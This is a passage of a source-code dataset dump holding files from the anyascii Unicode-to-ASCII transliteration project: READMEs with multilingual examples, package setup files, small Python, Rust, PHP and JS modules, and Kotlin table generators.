X$b B='$s'.split '\\t' end\")\n }\n }\n}" }, { "alpha_fraction": 0.6799628734588623, "alphanum_fraction": 0.6934137344360352, "avg_line_length": 42.099998474121094, "blob_id": "79aae8a0955e156be5e9c6e576bf05fc1e2d1892", "content_id": "773f1d63100383551e8152b1c034ea74f8da3bd3", "detected_licenses": [ "GPL-1.0-or-later", "Artistic-1.0-Perl", "ISC" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 5268, "license_type": "permissive", "max_line_length": 133, "num_lines": 100, "path": "/unidecode/src/README", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "\t\t# -*- coding:utf-8; mode:Text; fill-column:79 -*-\n\t\t# Time-stamp: \"2016-07-24 03:12:31 MDT\"\n# (This page is in UTF-8!) |··················································|\n\nModule: Text::Unidecode-- make ASCII transliterations of Unicode text\n\nUnidecode makes ASCII transliterations of Unicode text. Sometimes it's dumb,\nbut it's better than looking at \"???\" or \"\\15BA\\15A0\\1610...\".\nIf you have smarter text-handling subroutines, Unidecode might be useful\nas a fallthrough for them.\n\nExample:\n print unidecode( \"北亰\\n\" );\n prints: Bei Jing\n\nSee more examples below.\n\nFor full documentation, run:\n perldoc Unidecode\nOr read:see:\n http://search.cpan.org/perldoc?Text::Unidecode \nAn article about how Unidecode runs:\n http://interglacial.com/tpj/22/\n\nREQUIREMENTS\nThis module requires Perl 5.8.0 at the very least. That's probably not a\nproblem for you, since that's from a decade ago!\n\nINSTALLATION\n* For using the \"CPAN Plus\" system, read: perldoc cpanp\n* For old-style \"make\" interface, read: perldoc perlmodinstall\n\n~~~ EXAMPLE UNIDECODE INPUT AND OUTPUT ~~~\n(Just two or three lines, from a few languages.)\n\nLa décennie voit le début des biotechnologies avec le premier clonage,\nles organismes génétiquement modifiés, le début du séquençage du\ngénome humain\n=> La decennie voit le debut des biotechnologies avec le premier clonage,\n les organismes genetiquement modifies, le debut du sequencage du\n genome humain\n\nWśród nocnej ciszy głos się rozchodzi:\nWstańcie, pasterze, Bóg się nam rodzi!\n=> Wsrod nocnej ciszy glos sie rozchodzi: \n Wstancie, pasterze, Bog sie nam rodzi! \n\nΚαθαίρονται δ᾽ ἄλλως αἵματι μιαινόμενοι οἷον εἴ τις εἰς πηλὸν ἐμβὰς\nπηλῷ ἀπονίζοντο. μαίνεσθαι δ᾽ ἂν δοκοίη, εἴ τίς μιν ἀνθρώπων\n=> Kathairontai d' allos aimati miainomenoi oion ei tis eis pelon embas\n pelo aponizonto. mainesthai d' an dokoie, ei tis min anthropon\n\nНа другой день к завтраку подавали очень вкусные пирожки, раков и\nбараньи котлеты; и пока ели, приходил наверх повар Никанор справиться,\n=> Na drughoi dien' k zavtraku podavali ochien' vkusnyie pirozhki, rakov i\n baran'i kotliety; i poka ieli, prikhodil navierkh povar Nikanor spravit'sia,\n\nNước trà (hay nước chè) là đồ uống phổ biến thứ hai trên thế giới (sau\nnước uống). Nó làm bằng cách ngâm lá, chồi, hay cành của cây chè\n=> Nuoc tra (hay nuoc che) la do uong pho bien thu hai tren the gioi (sau\n nuoc uong). No lam bang cach ngam la, choi, hay canh cua cay che\n\n#### And Then Things Get A Bit Suboptimal\n# But remember the Unidecode motto: \"It's better than nothing!\"\n\n유자차(柚子茶)는 유자청을 찬물이나 더운 물에 희석하여 마시는 한국의\n전통 차이다. 유자청은 얇게 자른 유자를 꿀이나 설탕과 섞은 뒤 3~4개월\n=> yujaca(You Zi Cha )neun yujaceongeul canmulina deoun mule hyiseoghayeo masineun hangugyi\n jeontong caida. yujaceongeun yalbge jareun yujareul ggulina seoltanggwa seoggeun dwi 3~4gaeweol\n\n* The Gayatri Mantra- Sanskrit\nॐ भूर्भुवः॒ स्वः । तत्स॑वितुर्वरे॑णियं ।\nभ॒र्गो॑ दे॒वस्य॑ धीमहि। । धियो॒ यो नः॑ प्रचो॒दया॑त्॥ । \n=> AUM bhuurbhuvH' svH / tts'viturvre'nniyN / \n bh'rgo' de'vsy' dhiimhi / / dhiyo' yo nH' prco'dyaa't // / \n\n道可道,非常道。名可名,非常名。無名天地之始;有名萬物之母。故常無欲,\n以觀其妙;常有欲,以觀其徼。此兩者,同出而異名,同謂之玄。玄之又玄,衆\n=> Dao Ke Dao ,Fei Chang Dao . Ming Ke Ming ,Fei Chang Ming . Wu Ming Tian Di Zhi Shi ;You Ming Wan Wu Zhi Mu . Gu Chang Wu Yu ,\n Yi Guan Qi Miao ;Chang You Yu ,Yi Guan Qi Jiao . Ci Liang Zhe ,Tong Chu Er Yi Ming ,Tong Wei Zhi Xuan . Xuan Zhi You Xuan ,Zhong \n\n#Yiddish. Directionality and ligature might come out wrong in your browser/editor:]\n‏טיי איז א געטראנק וואס מען טרינקט איבער דער גארער וועלט. טיי ווערט\nגעמאכט דורך ווייקן די געטרוקנטע בלעטער אדער בלומען פון דעם פלאנץ‎\n=> tyy yz g`trnq vvs m`n trynqt yb`r d`r gr`r vv`lt. tyy vv`rt\n g`mkt dvrk vvyyqn dy g`trvqnt` bl`t`r d`r blvm`n pvn d`m plnts\n\n\n#Urdu. Directionality and ligature might come out wrong in your browser/editor:]\n‏چائے دنیا کی پسندیدہ مشروب ہے۔ یہ چاۓ کے پودے کی پتیوں کو چند منٹ گرم\nپانی میں ابالنے سے تیار ہوتی ہے۔‎\n=> chy'y dny khy psndydh mshrwb hy. yh chy' khy pwdy khy ptywN khw chnd mntt grm\n pny myN blny sy tyr hwty hy.\n\n======================================================================\nEND OF README\n======================================================================\n{{{\nGenerated at Sat Nov 26 05:10:31 2016 (1480162231)\n}}}\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6081871390342712, "avg_line_length": 25.75, "blob_id": "42f44404ebb90085e8e1e6d4a8b780e4b844503c", "content_id": "a28b5a8175f7afbf4336374fea5ed39b68bec6d5", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "permissive", "max_line_length": 56, "num_lines": 32, "path": "/python/setup.py", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "import os\nimport setuptools\n\n\ndef read(fname):\n p = os.path.join(os.path.dirname(__file__), fname)\n if os.path.exists(p):\n return open(p, encoding='utf-8').read()\n else:\n return \"\"\n\n\nsetuptools.setup(\n author=\"Hunter WB\",\n author_email=\"[email protected]\",\n name='anyascii',\n version='0.1.7-dev',\n description='Unicode to ASCII transliteration',\n long_description=read('../README.md'),\n long_description_content_type='text/markdown',\n license='ISC',\n url='https://github.com/anyascii/anyascii',\n packages=setuptools.find_packages(),\n python_requires=\">=3.3\",\n zip_safe=True,\n classifiers=[\n 'License :: OSI Approved :: ISC License (ISCL)',\n 'Topic :: Text Processing :: General',\n 'Topic :: Text Processing :: Linguistic',\n 'Programming Language :: Python :: 3 :: Only',\n ]\n)" }, { "alpha_fraction": 0.47727271914482117, "alphanum_fraction": 0.4857954680919647, "avg_line_length": 25.074073791503906, "blob_id": "6786c627bdff1f9fb5a0278a7700c46bfc46f82b", "content_id": "0c03707741990f3219b02de69324395770771c07", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 704, "license_type": "permissive", "max_line_length": 78, "num_lines": 27, "path": "/python/anyascii/__init__.py", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "import importlib\n\n_blocks = {}\n\n\ndef anyascii(string):\n result = []\n for char in string:\n codepoint = ord(char)\n if codepoint <= 0x7f:\n result.append(char)\n continue\n blocknum = codepoint >> 8\n lo = codepoint & 0xff\n try:\n block = _blocks[blocknum]\n except KeyError:\n try:\n m = importlib.import_module('anyascii._data._%03x' % blocknum)\n block = tuple(m.b.split('\\t'))\n del m.b\n except ImportError:\n block = ()\n _blocks[blocknum] = block\n if len(block) > lo:\n result.append(block[lo])\n return ''.join(result)\n" }, { "alpha_fraction": 0.45330294966697693, "alphanum_fraction": 0.45558086037635803, "avg_line_length": 23.38888931274414, "blob_id": "bf033132be24d421b7b889c702b8081afe110342", "content_id": "029e647e3705e5735976e986f270a945be4c24d4", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 439, "license_type": "permissive", "max_line_length": 60, "num_lines": 18, "path": "/rust/src/main.rs", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "extern crate any_ascii;\nuse any_ascii::any_ascii;\n\nfn main() {\n let args = std::env::args().skip(1).collect::<Vec<_>>();\n\n if args.is_empty() {\n println!(\n \"{}\\n{}\\n{}\\n{}\",\n env!(\"CARGO_PKG_NAME\"),\n env!(\"CARGO_PKG_VERSION\"),\n env!(\"CARGO_PKG_DESCRIPTION\"),\n env!(\"CARGO_PKG_HOMEPAGE\")\n );\n } else {\n println!(\"{}\", any_ascii(&args.join(\" \")));\n }\n}\n" }, { "alpha_fraction": 0.4766462445259094, "alphanum_fraction": 0.4923430383205414, "avg_line_length": 35.29166793823242, "blob_id": "4b941185727f49f5d02c0ced1e4adfe41384481b", "content_id": "5838e8c8854b623d51c0a97d6d331053e7a13d30", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Maven POM", "length_bytes": 2612, "license_type": "permissive", "max_line_length": 108, "num_lines": 72, "path": "/pom.xml", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project xmlns=\"http://maven.apache.org/POM/4.0.0\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\">\n <modelVersion>4.0.0</modelVersion>\n\n <groupId>com.anyascii</groupId>\n <artifactId>anyascii-build</artifactId>\n <version>0.1.7-SNAPSHOT</version>\n\n <properties>\n <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>\n <version.kotlin>1.3.72</version.kotlin>\n <version.java>11</version.java>\n </properties>\n\n <dependencies>\n <dependency>\n <groupId>org.jetbrains.kotlin</groupId>\n <artifactId>kotlin-stdlib</artifactId>\n <version>${version.kotlin}</version>\n </dependency>\n <dependency>\n <groupId>com.ibm.icu</groupId>\n <artifactId>icu4j</artifactId>\n <version>67.1</version>\n </dependency>\n <dependency>\n <groupId>com.fasterxml.jackson.module</groupId>\n <artifactId>jackson-module-kotlin</artifactId>\n <version>2.10.3</version>\n </dependency>\n </dependencies>\n <build>\n <plugins>\n <plugin>\n <groupId>org.jetbrains.kotlin</groupId>\n <artifactId>kotlin-maven-plugin</artifactId>\n <version>${version.kotlin}</version>\n <executions>\n <execution>\n <id>compile</id>\n <phase>process-sources</phase>\n <goals>\n <goal>compile</goal>\n </goals>\n </execution>\n </executions>\n <configuration>\n <jvmTarget>${version.java}</jvmTarget>\n </configuration>\n </plugin>\n <plugin>\n <groupId>org.codehaus.mojo</groupId>\n <artifactId>exec-maven-plugin</artifactId>\n <version>1.6.0</version>\n <executions>\n <execution>\n <id>exec</id>\n <phase>package</phase>\n <goals>\n <goal>java</goal>\n </goals>\n </execution>\n </executions>\n <configuration>\n <mainClass>com.anyascii.build.MainKt</mainClass>\n </configuration>\n </plugin>\n </plugins>\n </build>\n</project>" }, { "alpha_fraction": 0.2921348214149475, "alphanum_fraction": 0.2921348214149475, "avg_line_length": 89, "blob_id": "35cba63907695249a72f9e89ff7124c77b5d12bd", "content_id": "3f7f534e1aae96784460d2307bf24e015425d22c", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 89, "license_type": "permissive", "max_line_length": 89, "num_lines": 1, "path": "/php/_data/_2e0.php", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "<?php return explode('\t','\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tLao\t\t\t\t\t\tGun\t\t\t\t\t\t\t\tGeng');" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5, "avg_line_length": 40, "blob_id": "d2a4ee0a99e65a267124e9bec1184e3f821c455b", "content_id": "7fce88704017694d7abbee34e18d6f8fa2cced16", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 40, "license_type": "permissive", "max_line_length": 40, "num_lines": 1, "path": "/js/data/2dd.js", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module.exports='\t\t\t\t\t\t\t\t\t\tWu'.split('\t')" }, { "alpha_fraction": 0.7552728652954102, "alphanum_fraction": 0.7623307108879089, "avg_line_length": 38.68404006958008, "blob_id": "efd2052f97c219d75a6c67eb564d4cd01f83614b", "content_id": "d7db437720655e74def497c68369a2b7be448bea", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 12710, "license_type": "permissive", "max_line_length": 238, "num_lines": 307, "path": "/README.md", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "# AnyAscii [![build](https://travis-ci.org/anyascii/anyascii.svg?branch=master)](https://travis-ci.org/anyascii/anyascii)\n[![jitpack](https://img.shields.io/jitpack/v/github/anyascii/anyascii)](https://jitpack.io/#com.anyascii/anyascii)\n[![npm](https://img.shields.io/npm/v/any-ascii)](https://www.npmjs.com/package/any-ascii)\n[![packagist](https://img.shields.io/packagist/v/anyascii/anyascii)](https://packagist.org/packages/anyascii/anyascii)\n[![pypi](https://img.shields.io/pypi/v/anyascii)](https://pypi.org/project/anyascii/)\n[![gem](https://img.shields.io/gem/v/any_ascii)](https://rubygems.org/gems/any_ascii)\n[![crates.io](https://img.shields.io/crates/v/any_ascii)](https://crates.io/crates/any_ascii)\n[![nuget](https://img.shields.io/nuget/v/AnyAscii)](https://www.nuget.org/packages/AnyAscii)\n\nUnicode to ASCII transliteration\n\n[**Web Demo**](https://anyascii.com)\n\n#### Table of Contents\n\n* [Description](#description)\n[Examples](#examples)\n[Background](#background)\n[Details](#details)\n* [Implementations](#implementations):\n[Go](#go)\n[Java](#java)\n[JavaScript](#javascript)\n[PHP](#php)\n[Python](#python)\n[Ruby](#ruby)\n[Rust](#rust)\n[Shell](#shell)\n[.NET](#net)\n* [Unidecode](#unidecode)\n[See Also](#see-also)\n\n## Description\n\nConverts Unicode text to a reasonable representation using only ASCII.\n\nFor most characters in Unicode, AnyAscii provides an ASCII-only replacement string.\nText is converted character-by-character without considering the context.\nThe mappings for each script are based on popular existing romanization schemes.\nSymbolic characters are converted based on their meaning or appearance.\nAll ASCII characters in the input are left unchanged,\nevery other character is replaced with printable ASCII characters.\nUnknown characters are removed.\n\n## Examples\n\nRepresentative examples for different languages comparing the AnyAscii output to the conventional romanization.\n\n|Language (Script)|Input|Output|Conventional|\n|---|---|---|---|\n|French (Latin)|René François Lacôte|Rene Francois Lacote|Rene Francois Lacote|\n|German (Latin)|Großer Hörselberg|Grosser Horselberg|Grosser Hoerselberg|\n|Vietnamese (Latin)|Trần Hưng Đạo|Tran Hung Dao|Tran Hung Dao|\n|Norwegian (Latin)|Nærøy|Naeroy|Naroy|\n|Ancient Greek (Greek)|Φειδιππίδης|Feidippidis|Pheidippides|\n|Modern Greek (Greek)|Δημήτρης Φωτόπουλος|Dimitris Fotopoylos|Dimitris Fotopoulos|\n|Russian (Cyrillic)|Борис Николаевич Ельцин|Boris Nikolaevich El'tsin|Boris Nikolayevich Yeltsin|\n|Ukrainian (Cyrillic)|Володимир Горбулін|Volodimir Gorbulin|Volodymyr Horbulin|\n|Bulgarian (Cyrillic)|Търговище|T'rgovishche|Targovishte|\n|Mandarin Chinese (Han)|深圳|ShenZhen|Shenzhen|\n|Cantonese Chinese (Han)|深水埗|ShenShuiBu|Sham Shui Po|\n|Korean (Hangul)|화성시|HwaSeongSi|Hwaseong-si|\n|Korean (Han)|華城市|HuaChengShi|Hwaseong-si|\n|Japanese (Hiragana)|さいたま|saitama|Saitama|\n|Japanese (Han)|埼玉県|QiYuXian|Saitama-ken|\n|Japanese (Katakana)|トヨタ|toyota|Toyota|\n|Amharic (Ethiopic)|ደብረ ዘይት|debre zeyt|Dobre Zeyit|\n|Tigrinya (Ethiopic)|ደቀምሓረ|dek'emhare|Dekemhare|\n|Arabic|دمنهور|dmnhwr|Damanhur|\n|Armenian|Աբովյան|Abovyan|Abovyan|\n|Georgian|სამტრედია|samt'redia|Samtredia|\n|Hebrew|אברהם הלוי פרנקל|'vrhm hlvy frnkl|Abraham Halevi Fraenkel|\n|Manding (N'Ko)|ߞߐߣߊߞߙߌ߫|konakri|konakiri|\n|Unified English Braille (Braille)|⠠⠎⠁⠽⠀⠭⠀⠁⠛|+say x ag|Say it again|\n|Bengali|ময়মনসিংহ|mymnsimh|Mymensingh|\n|Burmese (Myanmar)|ထန်တလန်|htntln|Thantlang|\n|Gujarati|પોરબંદર|porbmdr|Porbandar|\n|Hindi (Devanagari)|महासमुंद|mhasmumd|Mahasamund|\n|Kannada|ಬೆಂಗಳೂರು|bemgluru|Bengaluru|\n|Khmer|សៀមរាប|siemrab|Siem Reap|\n|Lao|ສະຫວັນນະເຂດ|sahvannaekhd|Savannakhet|\n|Malayalam|കളമശ്ശേരി|klmsseri|Kalamassery\n|Odia|ଗଜପତି|gjpti|Gajapati|\n|Punjabi (Gurmukhi)|ਜਲੰਧਰ|jlmdhr|Jalandhar|\n|Sinhala|රත්නපුර|rtnpur|Ratnapura|\n|Tamil|கன்னியாகுமரி|knniyakumri|Kanniyakumari|\n|Telugu|శ్రీకాకుళం|srikakulm|Srikakulam|\n|Thai|สงขลา|sngkhla|Songkhla|\n\n|Symbols|Input|Output|\n|---|---|---|\n|Emojis|😎 👑 🍎|`:sunglasses: :crown: :apple:`|\n|Misc.|☆ ♯ ♰ ⚄ ⛌|* # + 5 X|\n|Letterlike|№ ℳ ⅋ ⅍|No M & A/S|\n\n## Background\n\n> Unicode is the foundation for text in all modern software:\n> it’s how all mobile phones, desktops, and other computers represent the text of every language.\n> People are using Unicode every time they type a key on their phone or desktop computer, and every time they look at a web page or text in an application.\n> [*](https://www.unicode.org/reports/tr51/#Encoding)\n\n[Unicode](https://en.wikipedia.org/wiki/Unicode) is the universal character set, a global standard to support all the world's languages.\nIt contains 140,000+ characters used by 150+ scripts along with emojis and various symbols.\nTypically encoded into bytes using [UTF-8](https://en.wikipedia.org/wiki/UTF-8).\n\n[ASCII](https://en.wikipedia.org/wiki/ASCII) is the most compatible character set, established in 1967.\nIt is a subset of Unicode and UTF-8 consisting of 128 characters using 7-bits.\nThe [printable](https://en.wikipedia.org/wiki/ASCII#Printable_characters) characters are English letters, digits, and punctuation,\nwith the remaining being [control characters](https://en.wikipedia.org/wiki/ASCII#Control_characters).\nThe characters found on a standard US keyboard correspond to the printable ASCII characters.\n\n> ... expressed only in the original non-control ASCII range so as to be as widely compatible with as many existing tools, languages, and serialization formats as possible and avoid display issues in text editors and source control.\n> [*](https://spec.graphql.org/June2018/#sec-Source-Text)\n\nA language is written using characters from a specific [script](https://en.wikipedia.org/wiki/Writing_system).\nA script can be [alphabetic](https://en.wikipedia.org/wiki/Alphabet), [logographic](https://en.wikipedia.org/wiki/Logogram), [syllabic](https://en.wikipedia.org/wiki/Syllabary), or something else.\nSome languages use multiple scripts: Japanese uses Kanji, Hiragana, and Katakana.\nSome scripts are used by multiple languages: [Han characters](https://en.wikipedia.org/wiki/Chinese_characters) are used in Chinese, Japanese, and Korean.\nThe script used by English and ASCII is known as the [Latin script](https://en.wikipedia.org/wiki/Latin_script).\n\nWhen converting text between languages there are multiple properties that can be preserved:\n- Meaning: [Translation](https://en.wikipedia.org/wiki/Translation)\n- Appearance: Preserving the visual appearance of characters when converting between scripts is rarely possible and requires readers to have knowledge of the source language.\n- Sound: [Transcription](https://en.wikipedia.org/wiki/Orthographic_transcription) uses the spelling and pronunciation rules of the target language to produce text that will be pronounced as accurately as possible to the original.\n- Spelling: [Transliteration](https://en.wikipedia.org/wiki/Transliteration) converts each character individually using predictable rules.\n A reversible transliteration allows for reconstruction of the original text by using unique mappings for each character.\n\n[Romanization](https://en.wikipedia.org/wiki/Romanization) is the conversion into the Latin script using transliteration or transcription or a mix of both.\nRomanization is most commonly used when representing the names of people and places.\n\n> _South Korea's Ministry of Culture & Tourism_:\n> Clear to anyone, Romanization is for foreigners.\n> Geographical names are Romanized to help foreigners find the place they intend to go to and help them remember cities, villages and mountains they visited and climbed.\n> But it is Koreans who make up the Roman transcription of their proper names to print on their business cards and draw up maps for international tourists.\n> Sometimes, they write the lyrics of a Korean song in Roman letters to help foreigners join in a singing session or write part of a public address (in Korean) in Roman letters for a visiting foreign VIP.\n> In this sense, it is for both foreigners and the local public.\n> The Romanization system must not be a code only for the native English-speaking community here but an important tool for international communication between Korean society, foreign residents in the country and the entire external world.\n> If any method causes much confusion because it is unable to properly reflect the original sound to the extent that different words are transcribed into the same Roman characters too frequently, it definitely is not a good system.\n> [*](https://web.archive.org/web/20070927204130/http://www.korea.net/korea/kor_loca.asp?code=A020303)\n\n## Details\n\n*Comprehensive*:\nSupports as many Unicode characters as possible.\nThe benefits of providing full support even for rare or historic characters outweighs the small overhead of including them.\n\n*Simple*:\nEasy to use, understand, and update.\nAble to be implemented with consistent behavior across multiple different programming languages.\nHas benefits for performance and data size.\n\n*Useful*:\nProvides reasonable approximations of the spelling or pronunciation.\nBased on popular romanization systems in general use.\n\n## Implementations\n\nAnyAscii is implemented in 9 different programming languages.\n\n### Go\n\n```go\nimport \"github.com/anyascii/go\"\n\ns := anyascii.Transliterate(\"άνθρωποι\")\n// anthropoi\n```\n\nGo 1.10+ Compatible\n\n### Java\n\n```java\nString s = AnyAscii.transliterate(\"άνθρωποι\");\n// anthropoi\n```\n\nJava 6+ compatible\n\nAvailable from [**JitPack**](https://jitpack.io/#com.anyascii/anyascii)\n\n### JavaScript\n\n##### Node.js\n\n```javascript\nconst anyAscii = require('any-ascii');\n\nconst s = anyAscii('άνθρωποι');\n// anthropoi\n```\n\nNode.js 4.0+ compatible\n\nInstall: `npm install any-ascii`\n\n### PHP\n\n```php\n$s = AnyAscii::transliterate('άνθρωποι');\n// anthropoi\n```\n\nPHP 5.3+ compatible\n\nInstall: `composer require anyascii/anyascii`\n\n### Python\n\n```python\nfrom anyascii import anyascii\n\ns = anyascii('άνθρωποι')\n# anthropoi\n```\n\nPython 3.3+ compatible\n\nInstall: `pip install anyascii`\n\n### Ruby\n\n```ruby\nrequire 'any_ascii'\n\ns = AnyAscii.transliterate('άνθρωποι')\n# anthropoi\n```\n\nRuby 2.0+ compatible\n\nInstall: `gem install any_ascii`\n\n### Rust\n\n```rust\nuse any_ascii::any_ascii;\n\nlet s = any_ascii(\"άνθρωποι\");\n// anthropoi\n```\n\nRust 1.20+ compatible\n\nInstall:\n```toml\n# Cargo.toml\n[dependencies]\nany_ascii = \"0.1.6\"\n```\n\n##### CLI\n\n```console\n$ anyascii άνθρωποι\nanthropoi\n```\n\nUse `cd rust && cargo build --release` to build a native executable to `rust/target/release/anyascii`\n\n### Shell\n\n```console\n$ anyascii άνθρωποι\nanthropoi\n```\n\nPOSIX-compliant\n\n[**Download**](https://github.com/anyascii/anyascii/blob/master/sh/anyascii)\n\n### .NET\n\nInstall from [**NuGet**](https://www.nuget.org/packages/AnyAscii)\n\n##### C#\n\n```cs\nusing AnyAscii;\n\nstring s = \"άνθρωποι\".Transliterate();\n// anthropoi\n```\n\n## Unidecode\n\nAnyAscii is an alternative to (and inspired by) [Unidecode](https://metacpan.org/pod/Text::Unidecode) and its many [ports](https://github.com/search?q=unidecode).\nAnyAscii is more up-to-date and supports more than twice as many characters.\nUnidecode was originally written in 2001 with minor updates through 2016.\nIt does not support any characters outside of the [BMP](https://en.wikipedia.org/wiki/Plane_(Unicode)#Basic_Multilingual_Plane).\n\nCompare `table.tsv` and `unidecode/table.tsv` for a complete comparison between AnyAscii and Unidecode.\nNote that the Unidecode output has been [modified slightly](unidecode/Unidecode.pl) and that unknown characters are replaced by `\"[?] \"` while they are removed by AnyAscii.\n\n## See Also\n\n[ALA-LC: Romanization Tables](https://www.loc.gov/catdir/cpso/roman.html) \n[BGN/PCGN: Guidance on Romanization Systems](https://www.gov.uk/government/publications/romanization-systems) \n[Discord: Emojis](https://github.com/anyascii/discord-emojis) \n[ISO: Transliteration Standards](https://www.iso.org/ics/01.140.10/x/p/1/u/1/w/1/d/1) \n[KNAB: Romanization Systems](https://www.eki.ee/knab/kblatyl2.htm) \n[Thomas T. Pedersen: Transliteration of Non-Roman Scripts](http://transliteration.eki.ee/) \n[UNGEGN: Working Group on Romanization Systems](https://www.eki.ee/wgrs/) \n[Unicode Technical Site](https://unicode.org/main.html) \n[Wikipedia: Romanization](https://www.google.com/search?q=site:en.wikipedia.org+romanization+OR+transliteration) \n[Wiktionary: Romanization](https://www.google.com/search?q=site:en.wiktionary.org+romanization+OR+transliteration) \n" }, { "alpha_fraction": 0.5517536401748657, "alphanum_fraction": 0.557741641998291, "avg_line_length": 32.42856979370117, "blob_id": "c7d4ec66caeb3202d78356528b9f0f5c72598fc6", "content_id": "4d388ee9633a0a3ed3b26239bc04102634dae095", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 1169, "license_type": "permissive", "max_line_length": 93, "num_lines": 35, "path": "/src/main/java/com/anyascii/build/gen/Java.kt", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "package com.anyascii.build.gen\n\nimport java.nio.file.Files\nimport java.nio.file.Path\n\nfun java(g: Generator) {\n val resources = Path.of(\"java/src/main/resources/com/anyascii\")\n resources.toFile().deleteRecursively()\n Files.createDirectories(resources)\n\n for ((blockNum, block) in g.blocks) {\n Files.newBufferedWriter(resources.resolve(\"%03x\".format(blockNum))).use { w ->\n for (s in block) {\n w.write(s)\n w.write(0)\n }\n }\n }\n\n Files.newBufferedWriter(Path.of(\"java/src/main/java/com/anyascii/Block.java\")).use { w ->\n w.write(\"package com.anyascii;\\n\\n\")\n w.write(\"final class Block {\\n\\n\")\n w.write(\"\\tstatic final String[][] blocks = new String[${g.blocks.size}][];\\n\\n\")\n w.write(\"\\tstatic int block(int blockNum) {\\n\")\n w.write(\"\\t\\tswitch (blockNum) {\\n\")\n for ((i, block) in g.blocks.keys.withIndex()) {\n val s = \"%03x\".format(block)\n w.write(\"\\t\\t\\tcase 0x$s: return $i;\\n\")\n }\n w.write(\"\\t\\t\\tdefault: return -1;\\n\")\n w.write(\"\\t\\t}\\n\")\n w.write(\"\\t}\\n\")\n w.write(\"}\\n\")\n }\n}" }, { "alpha_fraction": 0.4390243887901306, "alphanum_fraction": 0.4390243887901306, "avg_line_length": 41, "blob_id": "496aa3e46d538b52f42d1702a3381bad7c64cdb5", "content_id": "53638d965f414d15635c2efc5f784b53f12fbb8b", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 41, "license_type": "permissive", "max_line_length": 41, "num_lines": 1, "path": "/php/_data/_2dd.php", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "<?php return explode('\t','\t\t\t\t\t\t\t\t\t\tWu');" }, { "alpha_fraction": 0.44661378860473633, "alphanum_fraction": 0.46125686168670654, "avg_line_length": 29.644859313964844, "blob_id": "07afc9e17c9ca029607e64ad5de459cc613840d8", "content_id": "6def79670a72a575e8c8d142c5ff9f41b007737a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3278, "license_type": "permissive", "max_line_length": 123, "num_lines": 107, "path": "/src/main/java/com/anyascii/build/gen/Generator.kt", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "package com.anyascii.build.gen\n\nimport com.anyascii.build.Table\nimport com.anyascii.build.asString\nimport com.anyascii.build.isAscii\nimport com.anyascii.build.lengthStatistics\nimport java.io.ByteArrayOutputStream\nimport java.io.DataOutputStream\nimport java.util.TreeMap\n\nfun generate(table: Table) {\n val g = Generator(table)\n java(g)\n python(g)\n js(g)\n rust(g)\n go(g)\n ruby(g)\n cSharp(g)\n shell(g)\n php(g)\n}\n\nclass Generator(val table: Table) {\n\n val blocks = blocks()\n\n val stringsBank = stringsBank()\n\n val blockPointers = blockPointers()\n\n private fun blocks(): Map<Int, List<String>> {\n val m = TreeMap<Int, List<String>>()\n for (b in 0..0xFFF) {\n val block = List(256) { table[(b shl 8) or it] ?: \"\" }\n .dropLastWhile { it.isEmpty() }\n .mapIndexed { i, s -> if (b == 0 && i.isAscii()) \"\" else s }\n if (block.isEmpty()) continue\n m[b] = block\n }\n return m\n }\n\n private fun stringsBank(): String {\n val sb = StringBuilder()\n val ss = table.values.filter { it.length > 3 }\n val ss2 = ss.filter { a -> ss.none { b -> a != b && a in b } }.sortedBy { it.length }.toCollection(LinkedHashSet())\n while (ss2.isNotEmpty()) {\n val m = ss2.maxBy { overlap(sb, it) }!!\n ss2.remove(m)\n check(m !in sb)\n sb.append(m, overlap(sb, m), m.length)\n }\n check(ss.all { it in sb })\n return sb.toString()\n }\n\n private fun overlap(a: CharSequence, b: String): Int {\n for (i in (b.length - 1).downTo(1)) {\n if (a.endsWith(b.substring(0, i))) {\n return i\n }\n }\n return 0\n }\n\n private fun blockPointers(): Map<Int, ByteArray> {\n check(table.lengthStatistics().max <= 0x7f)\n check((stringsBank.length shr 16) == 0)\n val m = TreeMap<Int, ByteArray>()\n for ((blockNum, blockStrings) in blocks) {\n val out = ByteArrayOutputStream()\n val d = DataOutputStream(out)\n for ((lo, s0) in blockStrings.withIndex()) {\n val cp = (blockNum shl 8) or lo\n val s = if (cp.isAscii()) cp.asString() else s0\n when (s.length) {\n 0 -> {\n d.writeShort(0)\n d.writeByte(0x80)\n }\n 1 -> {\n 